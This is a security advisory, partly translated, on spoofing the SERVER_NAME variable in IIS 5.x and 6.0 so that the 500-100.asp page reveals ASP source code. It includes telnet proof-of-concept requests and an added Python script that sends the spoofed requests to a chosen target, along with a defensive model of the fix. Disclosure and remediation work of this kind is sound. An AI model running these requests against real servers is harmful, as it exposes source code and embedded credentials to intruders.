Remote IIS 5.x and IIS 6.0 Server Name Spoof


Source: http://book.51cto.com/art/201110/295931.htm
Author: Inge Henriksen
Organization: [Bug.Center.Team - Vulnerability Early-Warning Center Team]
Translation: 剑心 [BCT]
Note: This is not a complete translation (only the important parts were translated); refer to the original text further down.
IIS 5.0, 5.1 and 6.0 allow the "SERVER_NAME" server variable to be spoofed remotely by submitting a modified HTTP request. This can expose sensitive ASP source code through the IIS 500-100.asp error page, and the same spoof can potentially be used against a range of vulnerable third-party web applications and web services.

Technical details
Microsoft IIS discloses sensitive information when the "SERVER_NAME" server variable is "localhost". If an ASP page raises an error while "SERVER_NAME" is "localhost", the source code of the faulting line is shown in the browser. If you can spoof the "SERVER_NAME" variable, you can make IIS display whatever you want. Any third-party web application or web service that trusts this variable is affected in the same way.

The spoofed "SERVER_NAME" variable is read through request.servervariables("SERVER_NAME") in ASP or HttpContext.Current.Request.ServerVariables("SERVER_NAME") in .NET; other languages have their own accessors for it, and all of them are equally spoofable.

When the HTTP request comes from a remote client, the "SERVER_NAME" variable returns the web server's own IP address. When the request comes from the same IP address as the web server, request.servervariables("SERVER_NAME") returns "localhost". This can be used to convince a web application or web service that the visitor is the server itself, at which point the application shows its administrative interface to the visitor. One example is the IIS 5.x 500-100.asp page, which uses this variable to decide whether to display the code where the error occurred.

The variable is documented as "The server's host name, DNS alias, or IP address as it would appear in self-referencing URLs", so code often relies on it to decide whether an address is the server's own. This opens the door to abuses such as cookie theft, data redirection and other URL-handling problems.

Many other applications use this variable, and MSDN gives developers many example applications that can be attacked through this bug. The most serious are the Microsoft .NET Passport SDK examples: any web application or web service built on them is vulnerable because of this flaw.
Vendor Status: Notified 28 January 2005



Original:
It is possible to remotely spoof the "SERVER_NAME" Microsoft® Internet Information Server® 5.0, 5.1 and 6.0 server variable with a modified HTTP request. This can reveal sensitive ASP code through the IIS 500-100.asp error page, and the spoof also opens up a range of potential exploits in third-party web applications and web services.

Technical Description
Microsoft® IIS 5.x shows sensitive information if the "SERVER_NAME" IIS server variable is "localhost". If an IIS 5.x ASP page has an error, the code on the faulting line of the ASP page is shown in the browser, but only if the "SERVER_NAME" IIS server variable is "localhost". One can spoof the "SERVER_NAME" IIS server variable so that it contains whatever one wants. Other third-party web applications or web services may also be vulnerable if authentication depends on the validity of this server variable. IIS 6.0 is vulnerable to the spoof, but its 500-100.asp page is not.

The IIS server variable that can be spoofed is "SERVER_NAME". It can be accessed through request.servervariables("SERVER_NAME") in ASP and HttpContext.Current.Request.ServerVariables("SERVER_NAME") in .NET; other programming languages have other methods to access this server variable, but are equally vulnerable.

If the HTTP request comes from a remote client, then the server variable "SERVER_NAME" returns the IP address of the web server itself. If the HTTP request came from the same IP as the web server (that is, from an authenticated user browsing on the web server itself), then request.servervariables("SERVER_NAME") returns "localhost". This fact is used as "proof" in web applications or web services that the person browsing the web server is in fact browsing from the web server itself, and they may use this proof to display an administrative interface to the browser user. One exploitable example is the IIS 5.x 500-100.asp page (note: the IIS 6.0 500-100.asp page is not vulnerable); the page uses the server variable to determine whether to display the code where the error occurred.

The technical description of the server variable is "The server's host name, DNS alias, or IP address as it would appear in self-referencing URLs". It is therefore often used in one's code to determine the IP address of the web server itself, which opens up a range of exploits including cookie stealing, data redirection, and other URL manipulation issues.

There are many other applications that rely on the validity of this server variable, and MSDN holds many examples for developers that are easily exploitable with this bug; among the most serious are the Microsoft® .NET Passport SDK examples. Any web application or web service based on these examples is probably vulnerable due to the bug.

Vendor Status: Notified 28 January 2005, but still no fix available.

Confirmed applications: Microsoft® Internet Information Server® 5.0, Microsoft® Internet Information Server® 5.1 and Microsoft® Internet Information Server® 6.0.

Confirmed platforms: Microsoft® Windows® 2000 with SP4, Microsoft® Windows® XP Professional with SP2, Microsoft® Windows® 2003 with SP1.

Proof of concept #1
OK, you will need some sort of telnet client for this:

1. Create an ASP file called test.asp in the IIS web root and add the following code:
<% response.write request.servervariables("SERVER_NAME") %>

2. Try to access it from a remote machine with telnet. Use the following HTTP request (note: always press ENTER twice after an HTTP request to mark the end of the request message):
GET /test.asp HTTP/1.0

3. The reply is the IP address of the web server, as one would expect.
4. Try to access it from the web server itself. Use the following HTTP request:
GET /test.asp HTTP/1.0

5. The reply is "localhost", as one would expect.
6. Try to access it from a remote machine with telnet again. This time use the following HTTP request:
GET http://localhost/test.asp HTTP/1.0

7. It replies "localhost": you have just fooled IIS into thinking that the HTTP request came from a user browsing on the web server itself. The only difference between the two requests is that the request-target is written in absolute-URI form, so the host named there ends up in SERVER_NAME regardless of where the TCP connection actually came from.
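The three requests from the steps above, as an added example that is not part of the original advisory. build_request writes the request-target either in origin-form (step 2) or in absolute-URI form (step 6), absolute_uri_host shows the parsing the spoof relies on (the host is taken from the request line, not from the connection), and send_raw delivers the bytes over a plain socket the way the telnet session does. The target address 192.0.2.10, port 80 and the path /test.asp from step 1 are assumptions.

```python
"""Raw HTTP request crafting for the SERVER_NAME spoof (added example, not the
advisory's own code). Target host, port and path are assumptions; the sample
request lines are constructed for illustration."""
import socket
import sys
from urllib.parse import urlsplit


def build_request(path, spoofed_origin=None, version="HTTP/1.0"):
    """Return the raw request bytes for GET <target> <version>.

    With spoofed_origin (e.g. "http://localhost") the request-target is written in
    absolute-URI form; that host, not the connection's, is what IIS reports as
    SERVER_NAME. The double CRLF is the advisory's "double ENTER".
    """
    target = path if spoofed_origin is None else spoofed_origin.rstrip("/") + path
    return f"GET {target} {version}\r\n\r\n".encode("ascii")


def absolute_uri_host(request_line):
    """Return the host named in an absolute-URI request-target, or None.

    Mirrors the server-side parsing the spoof relies on: 'GET
    http://localhost/test.asp HTTP/1.0' names 'localhost' as the server even
    though the TCP connection came from a remote client.
    """
    parts = request_line.split()
    if len(parts) != 3:
        raise ValueError("malformed request line: %r" % request_line)
    target = parts[1]
    if "://" not in target:
        return None  # origin-form: nothing in the request line overrides SERVER_NAME
    return urlsplit(target).hostname


def send_raw(host, port, raw_request, timeout=5.0):
    """Send raw bytes and return the complete HTTP response (headers + body)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(raw_request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def response_body(raw_response):
    """Strip the status line and headers; return the body as text."""
    _head, _sep, body = raw_response.partition(b"\r\n\r\n")
    return body.decode("latin-1")


if __name__ == "__main__":
    # Usage: python spoof.py <target-ip>   (no argument: only print the requests)
    target_host = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.10"  # assumed
    for origin in (None, "http://localhost", "http://198.2.168.1"):
        raw = build_request("/test.asp", origin)
        print(raw.decode("ascii").rstrip(), "->", absolute_uri_host(raw.decode("ascii").splitlines()[0]))
        if len(sys.argv) > 1:
            print("   reply:", response_body(send_raw(target_host, 80, raw)).strip())
```

Run it without an argument to see the request lines and the host each one names; with a target address it sends all three and prints what test.asp echoes back, so the "localhost" reply of step 7 can be reproduced from any client.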


Proof of concept #2
This PoC shows how to get IIS 5.x to reveal the code of a page that is not functioning correctly, by tricking IIS's 500-100.asp into thinking that the HTTP request came from the web server itself. 500-100.asp is the IIS page that reveals the ASP code when an error occurs. The relevant part of it looks like this (note especially the strServername test in the If condition):

--- Snip from the IIS file <webroot>/IISHelp/common/500-100.asp ---
strServername = LCase(Request.ServerVariables("SERVER_NAME"))
strServerIP = Request.ServerVariables("LOCAL_ADDR")
strRemoteIP = Request.ServerVariables("REMOTE_ADDR")
If (strServername = "localhost" Or strServerIP = strRemoteIP) And objASPError.File <> "?" Then
    Response.Write Server.HTMLEncode(objASPError.File)
    If objASPError.Line > 0 Then Response.Write ", line " & objASPError.Line
    If objASPError.Column > 0 Then Response.Write ", column " & objASPError.Column
    Response.Write "<br>"
    Response.Write "<font style=""COLOR:000000; FONT: 8pt/11pt courier new""><b>"
    Response.Write Server.HTMLEncode(objASPError.Source) & "<br>"
    If objASPError.Column > 0 Then Response.Write String((objASPError.Column - 1), "-") & "^<br>"
    Response.Write "</b></font>"
    blnErrorWritten = True
End If
...

Here you see that Microsoft® assumes that if Request.ServerVariables("SERVER_NAME") equals "localhost", the code where the bug happened may be returned to the client making the HTTP request. Because the two tests are joined with Or, the LOCAL_ADDR/REMOTE_ADDR comparison never gets a say once SERVER_NAME has been spoofed.
A normal HTTP request might look like this:
GET /test.asp HTTP/1.0

But by prefixing the path with "http://localhost", the contents of Request.ServerVariables("SERVER_NAME") change to "localhost". Like this:
GET http://localhost/test.asp HTTP/1.0

Not only "localhost" works; one can set it to anything:
GET http://www.someserver.xom/test.asp HTTP/1.0
GET http://198.2.168.1/test.asp HTTP/1.0

Now, armed with this knowledge, let us get down and dirty and reveal some code remotely:

1. Create a global.asa file in the root of your IIS web root with the following contents (the missing opening quote before Provider is the deliberate syntax error that makes the application fail to compile):
<script LANGUAGE=VBScript RUNAT=Server>
sub Application_OnStart()
Application("SQLConn") = Provider='sqloledb';Data Source=192.168.2.1;Initial Catalog=Test;User Id=someuser;Password=somepassword;"
end sub
</script>

2. Try to access the site from a remote machine with telnet. Use the following HTTP request:
GET / HTTP/1.0

3. The reply does not reveal the code on the "Application("SQLConn")..." line, as expected, since IIS 5.x recognizes you as being on a remote client. It does, however, tell you that there is an error on the page.

4. Now try the following HTTP request instead:
GET http://localhost/ HTTP/1.0

5. The reply displays the code, since the IIS server thinks you are browsing from the web server itself:

Microsoft VBScript compilation (0x800A03EA) Syntax error 127.0.0.1//global.asa, line 3, column 34
Application("SQLConn") = Provider='sqloledb';Data Source=192.168.2.1;Initial Catalog=Test;User Id=someuser;Password=somepassword;"
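The decision logic of 500-100.asp, modelled in Python as an added example (not code from the advisory or from IIS), beside two fixes. original_decision is the If condition quoted above; minimal_fix_decision drops the spoofable SERVER_NAME clause and keeps only the address comparison, which comes from the TCP connection rather than the request line; recommended_decision never echoes source to any client and leaves the detail in a server-side log. The three server-variable sets follow the advisory's description of how IIS fills SERVER_NAME, LOCAL_ADDR and REMOTE_ADDR for a remote request, a local request and a spoofed remote request; the addresses 192.0.2.10 and 198.51.100.7 and the error object are constructed for the example.

```python
"""Model of the 500-100.asp disclosure check beside hardened variants.
Added example, not IIS code. Addresses, scenarios and the error object are
constructed for illustration."""
from html import escape

SERVER_IP = "192.0.2.10"    # assumed address of the IIS host
CLIENT_IP = "198.51.100.7"  # assumed address of the remote attacker

# Constructed server-variable sets, per the advisory: SERVER_NAME is the server's
# IP for a remote request, "localhost" for a local one, and whatever the absolute
# URI in the request line names when spoofed. LOCAL_ADDR/REMOTE_ADDR come from
# the connection and are unaffected by the request line.
SCENARIOS = {
    "remote, origin-form":           {"SERVER_NAME": SERVER_IP,   "LOCAL_ADDR": SERVER_IP, "REMOTE_ADDR": CLIENT_IP},
    "local, origin-form":            {"SERVER_NAME": "localhost", "LOCAL_ADDR": "127.0.0.1", "REMOTE_ADDR": "127.0.0.1"},
    "remote, absolute-URI localhost": {"SERVER_NAME": "localhost", "LOCAL_ADDR": SERVER_IP, "REMOTE_ADDR": CLIENT_IP},
}

# Constructed stand-in for objASPError, using the fields 500-100.asp reads.
SAMPLE_ERROR = {
    "File": "/global.asa", "Line": 3, "Column": 34, "Description": "Syntax error",
    "Source": "Application(\"SQLConn\") = Provider='sqloledb';Data Source=192.168.2.1;"
              "Initial Catalog=Test;User Id=someuser;Password=somepassword;\"",
}


def original_decision(sv, err):
    """The If condition from IIS 5.x 500-100.asp. The Or makes SERVER_NAME,
    which the client controls via an absolute-URI request line, sufficient."""
    name = sv.get("SERVER_NAME", "").lower()
    return (name == "localhost" or sv.get("LOCAL_ADDR") == sv.get("REMOTE_ADDR")) and err["File"] != "?"


def minimal_fix_decision(sv, err):
    """Same check without the SERVER_NAME clause: the spoof no longer passes,
    but source is still shown to anyone who can connect from the server itself."""
    return sv.get("LOCAL_ADDR") == sv.get("REMOTE_ADDR") and err["File"] != "?"


def recommended_decision(sv, err):
    """Never reveal source to a client; the detail is logged server-side instead."""
    return False


def error_page(sv, err, decision, server_log):
    """Return the HTML body the client receives under the given decision rule and
    append the full detail to server_log (a list standing in for the server's log)."""
    detail = "%s, line %d, column %d: %s" % (err["File"], err["Line"], err["Column"], err["Source"])
    server_log.append("%s from %s: %s" % (err["Description"], sv.get("REMOTE_ADDR"), detail))
    body = ["<h1>The page cannot be displayed</h1>"]
    if decision(sv, err):
        # What the original page writes: file, position, the faulting line, a caret.
        body.append("<p>%s</p>" % escape(detail))
        body.append("<pre>%s^</pre>" % ("-" * (err["Column"] - 1)))
    return "\n".join(body)


if __name__ == "__main__":
    log = []
    for label, sv in SCENARIOS.items():
        for rule in (original_decision, minimal_fix_decision, recommended_decision):
            leaked = "somepassword" in error_page(sv, SAMPLE_ERROR, rule, log)
            print("%-32s %-22s source shown to client: %s" % (label, rule.__name__, leaked))
```

Running it prints which rule leaks the connection string in which scenario; the original rule shows it to the spoofed remote request, the minimal fix only to a genuinely local request, and the recommended rule to nobody, while every variant keeps the detail in the server-side log where an operator can read it.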
